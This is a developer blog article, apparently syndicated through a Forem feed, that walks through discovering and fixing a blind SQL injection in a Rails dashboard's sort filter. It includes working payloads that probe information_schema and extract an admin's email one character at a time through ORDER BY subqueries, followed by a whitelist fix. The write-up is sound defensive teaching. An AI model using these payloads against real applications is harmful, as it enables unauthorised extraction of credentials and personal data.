Forem: Nikita Pupko The latest articles on Forem by Nikita Pupko (@npupko). https://forem.com/npupko https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F81282%2Fcd26cdc2-abcf-47cf-af73-5c49814e0890.jpeg Forem: Nikita Pupko https://forem.com/npupko en Security vulnerabilities – how to find and fix them Nikita Pupko Fri, 02 Jul 2021 14:17:41 +0000 https://forem.com/datarockets/security-vulnerabilities-how-to-find-and-fix-them-18m7 https://forem.com/datarockets/security-vulnerabilities-how-to-find-and-fix-them-18m7 <p>This article is about <a href="https://datarockets.com/blog/code/sql-injection-security-vulnerability/">security vulnerabilities</a> that can be found in many projects. Ignoring them can have terrible consequences for businesses. Hopefully, they are easy to fix. Here I described how I found a vulnerability, showed how it could be used for data extracting from the database, and fixed it with just one line of code.</p> <p>During one of my tasks on the project, I worked on Dashboard improvements. Dashboard – it’s just the main page for users with different types of entities (showed by cards) and filters in the sidebar (search by keyword, order, filter by type).</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--GS6ceTHh--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--GS6ceTHh--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post.png" alt=""></a> </p> <p>Here is the HTML code of the <code>Sort</code> filter.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;select</span> <span class="na">name=</span><span class="s">"order_filter"</span> <span class="na">id=</span><span class="s">"order_filter"</span> <span class="na">class=</span><span class="s">"form-control custom-select"</span><span class="nt">&gt;</span> <span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"last_seen desc"</span><span class="nt">&gt;</span>Recent First<span class="nt">&lt;/option&gt;</span> <span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"created desc"</span><span class="nt">&gt;</span>Date Created ⬇<span class="nt">&lt;/option&gt;</span> <span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"created asc"</span><span class="nt">&gt;</span>Date Created ⬆<span class="nt">&lt;/option&gt;</span> <span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"title asc"</span><span class="nt">&gt;</span>A-Z<span class="nt">&lt;/option&gt;</span> <span class="nt">&lt;option</span> <span class="na">value=</span><span class="s">"title desc"</span><span class="nt">&gt;</span>Z-A<span class="nt">&lt;/option&gt;</span> <span class="nt">&lt;/select&gt;</span> </code></pre> </div> <p>Field name for ordering and order in one place with space between. Put your first thought that came to your mind in the comments. 😄</p> <p>My first thought was, “Why does <code>value</code> look pretty similar to the SQL request part?”. I decided to take a deeper look into it and found that we definitely pass it as:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight ruby"><code><span class="n">scope</span> <span class="o">=</span> <span class="n">scope</span><span class="p">.</span><span class="nf">filter_results</span><span class="p">(</span><span class="ss">keyword: </span><span class="vi">@keyword</span><span class="p">,</span> <span class="ss">state_filter: </span><span class="vi">@state_filter</span><span class="p">,</span> <span class="ss">order_filter: </span><span class="n">params</span><span class="p">[</span><span class="ss">:order_filter</span><span class="p">])</span> </code></pre> </div> <p>where <code>filter_results</code> is just a concern method that calls <code>state_filter</code> and <code>order_filter</code> on model if it exists.</p> <p>So, in model we just have this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight ruby"><code><span class="n">scope</span> <span class="ss">:keyword</span><span class="p">,</span> <span class="o">-&gt;</span> <span class="p">(</span><span class="n">keyword</span><span class="p">)</span> <span class="p">{</span> <span class="n">where</span><span class="p">(</span><span class="s2">"title like ?"</span><span class="p">,</span> <span class="s2">"%</span><span class="si">#{</span><span class="n">keyword</span><span class="si">}</span><span class="s2">%"</span><span class="p">)</span> <span class="p">}</span> <span class="n">scope</span> <span class="ss">:state_filter</span><span class="p">,</span> <span class="o">-&gt;</span> <span class="p">(</span><span class="n">state</span><span class="p">)</span> <span class="p">{</span> <span class="n">where</span><span class="p">(</span> <span class="ss">state: </span><span class="n">state</span> <span class="p">)</span> <span class="p">}</span> <span class="n">scope</span> <span class="ss">:order_filter</span><span class="p">,</span> <span class="o">-&gt;</span> <span class="p">(</span><span class="n">order_filter</span><span class="p">)</span> <span class="p">{</span> <span class="n">reorder</span><span class="p">(</span><span class="n">order_filter</span><span class="p">)}</span> <span class="c1"># &lt;- IMPORTANT LINE</span> </code></pre> </div> <blockquote> <p>ActiveRecord::QueryMethods#reorder Replaces any existing order defined on the relation with the specified order. User.order(’email DESC’).reorder(‘id ASC’) # generated SQL has ‘ORDER BY id ASC’<br> Source: <a href="https://apidock.com/rails/ActiveRecord/QueryMethods/reorder">https://apidock.com/rails/ActiveRecord/QueryMethods/reorder</a></p> </blockquote> <p>Hello! Let’s play with it a little. Firstly I decided to test the ability to pass different symbols into the query, and it works well.</p> <p>I changed one of the HTML filter options to different column names and symbols like brackets, and it works well. So, we have the hole. Let’s put our finger into it.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--AnEWk__H--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post-2.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--AnEWk__H--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post-2.png" alt=""></a></p> <p>So, how could it help us get some data from the table? We can do some condition and get the result which can be reflected in the order of the cards on the dashboard:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--j4tVci-u--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injection-post-3.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--j4tVci-u--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injection-post-3.png" alt=""></a></p> <p>Do you remember this game from Tarantino’s <strong>Inglorious Bastards</strong> film? When guys put stickers with the name of some person onto their foreheads and trying to guess this person’s name by using only questions with answers “Yes” or “No.”</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--hVvq5x_6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post-4.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--hVvq5x_6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post-4.png" alt=""></a></p> <p>Useful construction for <code>ORDER</code> SQL injection is a:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="p">(</span><span class="k">CASE</span> <span class="k">WHEN</span> <span class="n">condition</span> <span class="k">THEN</span> <span class="n">first_coumn_name</span> <span class="k">ELSE</span> <span class="n">second_column_name</span> <span class="k">END</span><span class="p">)</span> </code></pre> </div> <p>or<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="n">IF</span> <span class="p">(</span><span class="n">condition</span><span class="p">,</span> <span class="n">first_column_name</span><span class="p">,</span> <span class="n">second_column_name</span><span class="p">)</span> </code></pre> </div> <p>We just need to find a <code>condition</code> (as a question), and two column names to see the result and put it as <code>ORDER BY</code> value (like <code>Yes</code> and <code>No</code> answers).</p> <p>What could we put into the <code>condition</code> part? Everything. Literally everything.</p> <p>How about this?<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="n">IF</span> <span class="p">((</span><span class="k">SELECT</span> <span class="k">count</span><span class="p">(</span><span class="o">*</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span> <span class="k">WHERE</span> <span class="k">COLUMN_NAME</span> <span class="o">=</span> <span class="s1">'is_admin'</span> <span class="k">AND</span> <span class="k">table_name</span> <span class="o">=</span> <span class="s1">'users'</span> <span class="k">LIMIT</span> <span class="mi">1</span><span class="p">)</span><span class="o">&gt;</span><span class="mi">0</span><span class="p">,</span> <span class="s1">'YES'</span><span class="p">,</span> <span class="s1">'NO'</span><span class="p">);</span> </code></pre> </div> <p>If we have <code>is_admin</code> column in <code>users</code> table it should return <code>YES</code>.</p> <p>Let’s put in into query with column names for sorting:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="p">(</span><span class="k">SELECT</span> <span class="n">IF</span> <span class="p">((</span><span class="k">SELECT</span> <span class="k">count</span><span class="p">(</span><span class="o">*</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span> <span class="k">WHERE</span> <span class="k">COLUMN_NAME</span> <span class="o">=</span> <span class="s1">'admin'</span> <span class="k">AND</span> <span class="k">table_name</span> <span class="o">=</span> <span class="s1">'users'</span> <span class="k">LIMIT</span> <span class="mi">1</span><span class="p">)</span><span class="o">&gt;</span><span class="mi">0</span><span class="p">,</span> <span class="n">title</span><span class="p">,</span> <span class="n">created_at</span><span class="p">))</span> </code></pre> </div> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--S-TluD6_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post-5.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--S-TluD6_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post-5.png" alt=""></a></p> <p>The first card is Fundico, and the second is Area. There is no <code>is_admin</code> column in the users table. Let’s try just <code>admin</code> instead:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--HZIcAqJY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post-6.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--HZIcAqJY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post-6.png" alt=""></a></p> <p>Here we go! Now we know that we have <code>admin</code> column in our <code>users</code> table.</p> <p>P.S. The full query with injected code looks like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="nv">`table_1`</span><span class="p">.</span><span class="o">*</span> <span class="k">FROM</span> <span class="nv">`table_1`</span> <span class="k">WHERE</span> <span class="nv">`table_1`</span><span class="p">.</span><span class="nv">`id`</span> <span class="k">IN</span> <span class="p">(</span><span class="k">SELECT</span> <span class="k">DISTINCT</span> <span class="nv">`table_2`</span><span class="p">.</span><span class="nv">`deal_id`</span> <span class="k">FROM</span> <span class="nv">`table_2`</span> <span class="k">LEFT</span> <span class="k">OUTER</span> <span class="k">JOIN</span> <span class="nv">`team_members`</span> <span class="k">ON</span> <span class="nv">`team_members`</span><span class="p">.</span><span class="nv">`cool_dude_id`</span> <span class="o">=</span> <span class="nv">`table_2`</span><span class="p">.</span><span class="nv">`id`</span> <span class="k">WHERE</span> <span class="nv">`table_2`</span><span class="p">.</span><span class="nv">`state`</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span> <span class="k">AND</span> <span class="p">(</span><span class="n">table_2</span><span class="p">.</span><span class="n">user_id</span><span class="o">=***</span> <span class="k">or</span> <span class="n">team_members</span><span class="p">.</span><span class="n">user_id</span><span class="o">=***</span><span class="p">))</span> <span class="k">ORDER</span> <span class="k">BY</span> <span class="p">(</span><span class="k">SELECT</span> <span class="n">IF</span> <span class="p">((</span><span class="k">SELECT</span> <span class="k">count</span><span class="p">(</span><span class="o">*</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">information_schema</span><span class="p">.</span><span class="n">columns</span> <span class="k">WHERE</span> <span class="k">COLUMN_NAME</span> <span class="o">=</span> <span class="s1">'admin'</span> <span class="k">AND</span> <span class="k">table_name</span> <span class="o">=</span> <span class="s1">'users'</span> <span class="k">LIMIT</span> <span class="mi">1</span><span class="p">)</span><span class="o">&gt;</span><span class="mi">0</span><span class="p">,</span> <span class="n">title</span><span class="p">,</span> <span class="n">created_at</span><span class="p">))</span> </code></pre> </div> <p>Let’s find the rest of the data by analogy. Firstly we need to find <code>email</code> of any admin user to get access to the system.</p> <p>We could do this symbol by symbol using ASCII table:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Hc9Cuwnj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post-7.png" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Hc9Cuwnj--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://datarockets.com/wp-content/uploads/2021/06/SQL-injections-post-7.png" alt=""></a></p> <p>We just need to paste all symbols one by one and look for a match:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="n">IF</span> <span class="p">((</span><span class="k">SELECT</span> <span class="n">ASCII</span><span class="p">(</span><span class="k">SUBSTRING</span><span class="p">(</span><span class="n">email</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span> <span class="k">FROM</span> <span class="n">users</span> <span class="k">where</span> <span class="k">admin</span> <span class="o">=</span> <span class="k">true</span> <span class="k">LIMIT</span> <span class="mi">1</span><span class="p">)</span><span class="o">=</span><span class="mi">105</span><span class="p">,</span> <span class="n">title</span><span class="p">,</span> <span class="n">created_at</span><span class="p">)</span> </code></pre> </div> <p>This query returns true if the first ASCII code of symbol in the <code>email</code> of the first admin equals <code>105</code> (I.e., the first symbol of email is <code>i</code>).</p> <p>Then we go for the second symbol using <code>ASCII(SUBSTRING(email, 2, 1))</code> and find all symbols one by one.</p> <h2> Conclusion </h2> <p>We could find any information using this hole like credentials of all users, phones, addresses, etc. Always be careful and try not to use strings for searches and filters in Rails.</p> <blockquote> <p>Rails is well enough protected from vulnerabilities, but nothing can save you from your own mistakes.</p> </blockquote> <p>Use wrappers, like hashes and arrays. Don’t use <code>User.where(“name = ‘#{params[:name]'”)</code>.</p> <p>Use <code>User.where([“name = ?”, “#{params[:name]}”])</code> or <code>User.where({ name: params[:name] })</code> instead.</p> <p>This vulnerability can be fixed using just one line, for example:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight ruby"><code><span class="no">ORDER_FILTERS</span> <span class="o">=</span> <span class="p">{</span> <span class="ss">title_asc: </span><span class="s1">'title asc'</span><span class="p">,</span> <span class="ss">created_at_asc: </span><span class="s1">'created_at asc'</span><span class="p">}</span> <span class="n">scope</span> <span class="o">=</span> <span class="n">scope</span><span class="p">.</span><span class="nf">filter_results</span><span class="p">(</span><span class="ss">order_filter: </span><span class="no">ORDER_FILTERS</span><span class="p">[</span><span class="n">params</span><span class="p">[</span><span class="ss">:order_filter</span><span class="p">]])</span> </code></pre> </div> sql ruby rails